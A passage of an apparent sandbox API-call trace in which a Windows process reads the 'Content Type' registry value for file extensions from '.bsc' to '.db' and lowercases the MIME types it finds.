lpString2=".", cchCount2=1) returned 2 [0103.841] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".bsc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.841] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.842] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".c", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.842] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".c", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.842] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.842] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".c5e2524a-ea46-4f67-841f-6a9465d9d515", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.842] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".c5e2524a-ea46-4f67-841f-6a9465d9d515", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.842] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.842] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cab", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.842] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cab", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.842] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.842] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.842] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".camp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.842] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".camp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.843] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.843] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cat", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.843] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cat", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.843] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x3c) returned 0x0 [0103.843] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x2441aac, lpcbData=0x19fc20*=0x3c | out: lpType=0x19fc10*=0x1, lpData="application/vnd.ms-pki.seccat", lpcbData=0x19fc20*=0x3c) returned 0x0 [0103.843] CharLowerBuffW (in: lpsz="application/vnd.ms-pki.seccat", cchLength=0x1d | out: lpsz="application/vnd.ms-pki.seccat") returned 0x1d [0103.843] CharLowerBuffW (in: lpsz=".cat", cchLength=0x4 | out: lpsz=".cat") returned 0x4 [0103.843] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.843] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cc", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.843] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.843] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.843] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cda", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.843] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cda", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.844] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.844] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.844] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cdmp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.844] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.844] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.844] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cdx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.844] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.844] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.844] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdxml", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.844] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cdxml", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.844] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.845] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cer", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.845] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cer", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.845] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x36) returned 0x0 [0103.845] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a6bf4, lpcbData=0x19fc20*=0x36 | out: lpType=0x19fc10*=0x1, lpData="application/x-x509-ca-cert", lpcbData=0x19fc20*=0x36) returned 0x0 [0103.845] CharLowerBuffW (in: lpsz="application/x-x509-ca-cert", cchLength=0x1a | out: lpsz="application/x-x509-ca-cert") returned 0x1a [0103.845] CharLowerBuffW (in: lpsz=".cer", cchLength=0x4 | out: lpsz=".cer") returned 0x4 [0103.845] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cgm", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.845] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cgm", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.845] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.845] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.845] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".chk", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.845] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".chk", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.845] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.846] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".chm", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.846] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".chm", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.846] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.846] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.846] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cls", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.846] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.846] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cmd", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.846] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cmd", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.846] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.846] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cod", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.846] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cod", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.847] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.847] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".com", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.847] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".com", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.847] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.847] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".compositefont", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.847] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".compositefont", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.847] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.847] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.847] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.847] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".contact", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.847] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x24) returned 0x0 [0103.848] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24d2474, lpcbData=0x19fc20*=0x24 | out: lpType=0x19fc10*=0x1, lpData="text/x-ms-contact", lpcbData=0x19fc20*=0x24) returned 0x0 [0103.848] CharLowerBuffW (in: lpsz="text/x-ms-contact", cchLength=0x11 | out: lpsz="text/x-ms-contact") returned 0x11 [0103.848] CharLowerBuffW (in: lpsz=".contact", cchLength=0x8 | out: lpsz=".contact") returned 0x8 [0103.848] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpl", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.848] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cpl", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.848] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.848] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.848] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cpp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.848] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.848] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.848] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cr2", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.848] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cr2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.848] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.849] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249aea4, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="image/CR2", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.849] CharLowerBuffW (in: lpsz="image/CR2", cchLength=0x9 | out: lpsz="image/cr2") returned 0x9 [0103.849] CharLowerBuffW (in: lpsz=".cr2", cchLength=0x4 | out: lpsz=".cr2") returned 0x4 [0103.849] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crl", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.849] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".crl", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.849] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2a) returned 0x0 [0103.849] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24bc7ec, lpcbData=0x19fc20*=0x2a | out: lpType=0x19fc10*=0x1, lpData="application/pkix-crl", lpcbData=0x19fc20*=0x2a) returned 0x0 [0103.849] CharLowerBuffW (in: lpsz="application/pkix-crl", cchLength=0x14 | out: lpsz="application/pkix-crl") returned 0x14 [0103.849] CharLowerBuffW (in: lpsz=".crl", cchLength=0x4 | out: lpsz=".crl") returned 0x4 [0103.849] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.849] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.849] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".crt", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.849] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x36) returned 0x0 [0103.849] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a6ec4, lpcbData=0x19fc20*=0x36 | out: lpType=0x19fc10*=0x1, lpData="application/x-x509-ca-cert", lpcbData=0x19fc20*=0x36) returned 0x0 [0103.850] CharLowerBuffW (in: lpsz="application/x-x509-ca-cert", cchLength=0x1a | out: lpsz="application/x-x509-ca-cert") returned 0x1a [0103.850] CharLowerBuffW (in: lpsz=".crt", cchLength=0x4 | out: lpsz=".crt") returned 0x4 [0103.850] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crtx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.850] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".crtx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.850] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.850] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.850] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crw", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.850] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".crw", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.850] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.850] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249ae7c, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="image/CRW", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.850] CharLowerBuffW (in: lpsz="image/CRW", cchLength=0x9 | out: lpsz="image/crw") returned 0x9 [0103.850] CharLowerBuffW (in: lpsz=".crw", cchLength=0x4 | out: lpsz=".crw") returned 0x4 [0103.850] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cs", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.851] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cs", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.851] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.851] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csa", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.851] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".csa", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.851] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.851] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.851] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csproj", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.851] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".csproj", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.852] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.852] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".css", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.852] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".css", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.852] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x12) returned 0x0 [0103.852] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249ae7c, lpcbData=0x19fc20*=0x12 | out: lpType=0x19fc10*=0x1, lpData="text/css", lpcbData=0x19fc20*=0x12) returned 0x0 [0103.852] CharLowerBuffW (in: lpsz="text/css", cchLength=0x8 | out: lpsz="text/css") returned 0x8 [0103.852] CharLowerBuffW (in: lpsz=".css", cchLength=0x4 | out: lpsz=".css") returned 0x4 [0103.852] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.852] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.852] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".csv", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.852] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x32) returned 0x0 [0103.852] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x23f854c, lpcbData=0x19fc20*=0x32 | out: lpType=0x19fc10*=0x1, lpData="application/vnd.ms-excel", lpcbData=0x19fc20*=0x32) returned 0x0 [0103.853] CharLowerBuffW (in: lpsz="application/vnd.ms-excel", cchLength=0x18 | out: lpsz="application/vnd.ms-excel") returned 0x18 [0103.853] CharLowerBuffW (in: lpsz=".csv", cchLength=0x4 | out: lpsz=".csv") returned 0x4 [0103.853] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cur", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.853] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cur", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.853] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.853] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cxx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.853] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".cxx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.853] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.853] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.853] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dat", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.853] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".dat", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.853] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.853] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.854] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".db", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.854] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".db", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.854] RegQueryValueExW (in: hKey=0x3f2, 